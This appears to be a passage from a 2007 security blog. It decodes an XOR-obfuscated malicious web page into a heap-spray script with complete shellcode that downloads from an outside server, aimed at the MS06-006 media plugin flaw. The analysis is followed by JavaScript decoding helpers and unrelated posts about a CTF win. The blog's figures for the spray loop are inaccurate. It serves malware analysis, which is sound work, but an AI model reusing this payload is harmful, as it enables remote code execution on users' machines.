6\xb6\xe6\xa5\xd7\xa5\xd0\xb6\xe6\xa5\xd6\xa5\xd5\xb6\xe6\xa5\xa7\xa1\xd6\xb6\xe6\xa5\xd0\xa5\xd0\xb6\xe6\xa7\xa0\xa3\xa3\xb6\xe6\xa6\xd0\xa0\xd2\xb6\xe6\xa1\xd6\xa6\xa6\xb6\xe6\xa4\xab\xa5\xa6\xb6\xe6\xa3\xa3\xa5\xa6\xb6\xe6\xd0\xa3\xa0\xa0\xb6\xe6\xa3\xa0\xa5\xa7\xb6\xe6\xa0\xa3\xa7\xa3\xb6\xe6\xa3\xd0\xa4\xab\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd1\xa3\xd0\xb6\xe6\xa2\xd0\xa4\xa3\xb6\xe6\xab\xd1\xd2\xd7\xb6\xe6\xa3\xab\xa7\xa3\xb6\xe6\xa3\xaa\xd6\xd1\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd7\xa0\xa7\xb6\xe6\xa4\xd0\xa7\xa3\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xaa\xa6\xa0\xd0\xb6\xe6\xab\xd6\xd1\xd5\xb6\xe6\xa3\xd6\xa7\xd6\xb6\xe6\xd6\xab\xd6\xd0\xb6\xe6\xd5\xd5\xab\xa7\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd6\xd0\xab\xa0\xb6\xe6\xab\xa0\xa3\xa7\xb6\xe6\xa1\xa7\xa1\xd0\xb6\xe6\xd5\xd5\xa0\xd0\xb6\xe6\xaa\xa6\xd7\xa3\xb6\xe6\xd1\xd5\xa6\xa3\xb6\xe6\xa2\xd2\xa0\xa5\xb6\xe6\xa4\xa3\xa1\xd5\xb6\xe6\xa5\xd5\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xd1\xd5\xd5\xb6\xe6\xa1\xa7\xa6\xa7\xb6\xe6\xab\xd7\xd5\xd0\xb6\xe6\xd1\xd2\xa6\xa1\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa6\xa0\xa6\xa0\xb6\xe6\xd6\xd1\xa6\xa1\xb6\xe6\xa6\xa0\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xd1\xd5\xa6\xd7\xb6\xe6\xd5\xd6\xaa\xab\xb6\xe6\xa3\xd6\xab\xd2\xb6\xe6\xa6\xa0\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xa0\xd5\xd5\xb6\xe6\xa3\xa7\xd6\xd0\xb6\xe6\xa1\xd0\xab\xa0\xb6\xe6\xa5\xa1\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xa4\xd6\xd1\xd5\xb6\xe6\xd6\xa1\xd7\xab\xb6\xe6\xd6\xab\xa4\xa0\xb6\xe6\xd5\xd5\xa7\xa3\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd5\xd5\xa6\xa1\xb6\xe6\xd6\xab\xd7\xa3\xb6\xe6\xd5\xd5\xd7\xa4\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xa4\xa7\xa5\xab\xb6\xe6\xa4\xa3\xa4\xa7\xb6\xe6\xa1\xd5\xa0\xd2\xb6\xe6\xa0\xab\xa1\xd5\xb6\xe6\xa1\xd6\xa0\xaa\xb6\xe6\xa0\xa0\xa0\xa7\xb6\xe6\xa0\xa2\xa1\xd6\xb6\xe6\xa0\xa5\xa0\xaa\xb6\xe6\xa0\xa6\xa1\xd6\xb6\xe6\xa5\xa5\xa1\xd5\xb6\xe6\xa5\xd0\xa5\xaa\xb6\xe6\xa1\xd6\xa5\xa6\xb6\xe6\xa5\xab\xa4\xa3\xb6\xe6\xa3\xa3\xa4\xa3\xb1\xba\xa8\xaf\xbc\xc0\xd0\xc1\xda\xc3\xc7\xad\xaf\xb
c\xdb\xd6\xd2\xd7\xad\xaf\xd1\xdc\xd7\xca\xad\xaf\xd6\xde\xd1\xd6\xd7\xb3\xc0\xc1\xd0\xae\xb1\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xb
e\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xb
e\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xb
e\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xb
e\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xd2\xd2\xd2\xd2\xd1\xd1\xd1\xd1\xd0\xd0\xd0\xd0\xd7\xd7\xd7\xd7\xd6\xd6\xd6\xd6\xd5\xd5\xd5\xd5\xd4\xd4\xd4\xd4\xdb\xdb\xdb\xdb\xda\xda\xda\xda\xd9\xd9\xd9\xd9\xd8\xd8\xd8\xd8\xdf\xdf\xdf\xdf\xd2\xd2\xd2\x96\xdd\xdd\xdd\xdd\xdc\xdc\xdc\xdc\xd2\xd2\xd2\x96\xc2\xc2\xc2\xc2\xc1\xc1\xc1\xc1\xc0\xc0\xc0\xc0\xc7\xc7\xc7\xc7\xc6\xc6\xc6\xc6\xc5\xc5\xc5\xc5\xc4\xc4\xc4\xc4\xcb\xcb\xcb\xcb\xca\xca\xca\xca\xc9\xc9\xc9\xc9\xa3\xa3\xa3\xa3\xa2\xa2\xa2\xa2\xa1\xa1\xa1\xa1\xa0\xa0\xa0\xa0\xa7\xa7\xa7\xa7\xa6\xa6\xa6\xa6\xa5\xa5\xa5\xa5\xa4\xa4\xa4\xa4\xab\xab\xab\xab\xaa\xaa\xaa\xaa\xbd\xe4\xfe\xe5\xb1\xad\xaf\xbc\xd6\xde\xd1\xd6\xd7\xad\xaf\xbc\xd1\xdc\xd7\xca\xad\xaf\xbc\xdb\xc7\xde\xdf\xad\xb3";

var xored_str = xor_str(plain_str, 147);

document.write(xored_str);
</script>

Which gets decoded as:


<SCRIPT>
var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do{s+=s;}while(s.length<0x0900000);
s+=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u382F%u2E39%u3334%u312E%u3639%u352E%u662F%u6C69%u2E65%u6870%u0070");
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv">
</EMBED>


In that last bit, the variable "s" starts with "AAAAAAAA". Then, the do/while loop takes the "s" variable and adds itself to itself 9,437,184 times (0x0900000). After you get 75,497,472 "A"s, it adds shellcode to the end. Redirecting the shellcode to a file and running the file command on it returns "/tmp/js1.sploit: MS-DOS executable (COM)".
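
The following helpers, written for this post as an added example (not the attacker's script and not tooling from the blog), walk the same decode chain offline: a reconstruction of the xor_str() stage as a per-character XOR with a single-byte key (147 reproduces the decoded page), a hand-written unescape() for the %uXXXX notation, a model of the do/while spray loop that steps the doubling instead of allocating the string, and a strings(1)-style scan over the shellcode bytes. The spray seed and the shellcode excerpts are constructed from the decoded script shown above.

```javascript
// Reconstruction of the page's xor_str(): XOR every char code with the key.
// XOR is its own inverse, so the same call encodes and decodes.
function xorStr(str, key) {
  let out = "";
  for (let i = 0; i < str.length; i++) {
    out += String.fromCharCode(str.charCodeAt(i) ^ key);
  }
  return out;
}

// Minimal unescape(): %uXXXX -> one UTF-16 code unit, %XX -> one char,
// anything else passes through. Hand-written to avoid the deprecated global.
function unescapeLite(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u4, x2) =>
    String.fromCharCode(parseInt(u4 !== undefined ? u4 : x2, 16)));
}

// Byte layout of a JS string in memory: UTF-16, little-endian. This is the
// order in which the sprayed shellcode bytes actually land.
function utf16leBytes(str) {
  const bytes = [];
  for (let i = 0; i < str.length; i++) {
    const cu = str.charCodeAt(i);
    bytes.push(cu & 0xff, cu >> 8);
  }
  return bytes;
}

// Model of  do { s += s; } while (s.length < threshold)  without allocating:
// the string doubles per pass, so the loop stops at the first
// seedLength * 2^n >= threshold. Returns {doublings, chars, bytes}.
function sprayLoopSize(seedLength, threshold) {
  let chars = seedLength;
  let doublings = 0;
  do {
    chars *= 2;
    doublings += 1;
  } while (chars < threshold);
  return { doublings, chars, bytes: chars * 2 };
}

// strings(1)-style extraction: printable ASCII runs of at least minLen bytes.
function printableRuns(bytes, minLen = 6) {
  const runs = [];
  let cur = "";
  for (const b of bytes.concat([0])) {
    if (b >= 0x20 && b <= 0x7e) { cur += String.fromCharCode(b); continue; }
    if (cur.length >= minLen) runs.push(cur);
    cur = "";
  }
  return runs;
}

// Constructed excerpts from the decoded <SCRIPT> above: the spray seed,
// the loop bound, the first four shellcode code units and the last fourteen.
const SPRAY_SEED = "%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141";
const SPRAY_THRESHOLD = 0x0900000;
const SHELLCODE_HEAD = "%u54EB%u758B%u8B3C%u3574";
const SHELLCODE_TAIL = "%u7468%u7074%u2F3A%u382F%u2E39%u3334%u312E%u3639%u352E%u662F%u6C69%u2E65%u6870%u0070";

// Run the whole analysis and return the findings as a plain object.
function analyseSpray() {
  const seed = unescapeLite(SPRAY_SEED);
  const size = sprayLoopSize(seed.length, SPRAY_THRESHOLD);
  const headBytes = utf16leBytes(unescapeLite(SHELLCODE_HEAD)); // EB 54 = jmp short
  const tailStrings = printableRuns(utf16leBytes(unescapeLite(SHELLCODE_TAIL)));
  return { seedChars: seed.length, ...size, headBytes, tailStrings };
}
```

The seed is eight code units (sixteen 0x41 bytes), and stepping the loop shows it doubles 21 times before s.length clears 0x0900000; the tail of the shellcode decodes to a plain ASCII download URL, which is the indicator worth pulling out of such a sample.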

The final part of the decoded page might look familiar... if not, check out Windows Media Player Plug-in for Non-Microsoft Browsers Code Execution (MS06-006) - Exploit II.

Thursday, August 09, 2007

the H@cker Elite: UF engineers compete in Vegas

Folks around work get really stoked about our team winning which is cool. It's nice to be in the limelight but I find the need to keep reminding people that it wasn't just psifertex or myself that won CTF. It was a team effort and we couldn't have done it without having the right make up of people, personalities and technical skills.

I think that April Dudash from the Alligator did a wonderful job (article) capturing that sentiment. Thank you, April.

And, thank you, team 1@stplace and @tlas. Every one of you is incredible and I'm thankful to walk amongst you.

Sunday, August 05, 2007

1@stplace wins DefCon CTF 2 yrs in a row

After 24 hrs of competition over 3 days in Vegas, team 1@stplace took first place in the DefCon Capture the Flag contest hosted by Kenshoto. Headed up by team captain @tlas and co-captain Doc Brown (aka drb), we sifted our way through the maze of brilliant confusion weaved together by the Kenshoto guys. They are truly an amazing bunch of dedicated hackers who design the CTF challenges to take their fellow and aspiring hackers to the next level.

I am blessed to have been able to compete again with the talented 1@stplace team composed of @tlas, Doc Brown, fury, jrod, plato, psifertex, shiruken, wrffr and myself (mezzendo). @tlas provided great leadership throughout the time leading up to CTF and during the entire weekend. Teamwork, friendship and communication were key to our win.

Thank you @tlas for believing in me and picking me to be a part of this awesome experience two years in a row.

Monday, July 30, 2007

Evil Bits: Fighting Forensics

As if freelance writing with things now appearing in both Network Computing and Information Week magazines weren't keeping me busy enough, I'm now a blogger with DarkReading.com. My blog is titled "Evil Bits" and the first post is now available, "Fighting Forensics." It covers some of the current news surrounding antiforensics being released at Black Hat this week, a little history about this area of research and links to previous presentations from Black Hat. Chew up a red pill and take a read...

Monday, July 23, 2007

Microsoft Malware Removal Starter Kit

I came across this "Microsoft Malware Removal Starter Kit" Friday evening. I don't remember where I saw it, now, but it was released on July 10 and didn't get any recognition in any of the blogs that I frequent.

Basically, they've put together instructions for what I had created while at a previous position here at UF. The HelpDesk for our dept needed a way to do offline scanning and no one was capable of using a Linux Live boot CD to run ClamAV, so I created a disk with BartPE and included several useful tools such as a registry editor and CLI version of McAfee VirusScan.

While BartPE bordered on being a violation of MS' EULA, it never became a target of MS for a takedown. It's interesting that MS has now decided to leverage their WinPE for doing malware removal. Sure, they leave it up to the user to create the disk and add the tools, but they have a brain dead guide on how to do it. Maybe someone at MS said, "Hey, we use this WinPE thingie for creating images for deploying via WDS and installing Windows. I bet we could add more tools and make it even more useful." Well, they probably didn't say that, but I'm glad they didn't say something like, "How can we charge for this!"

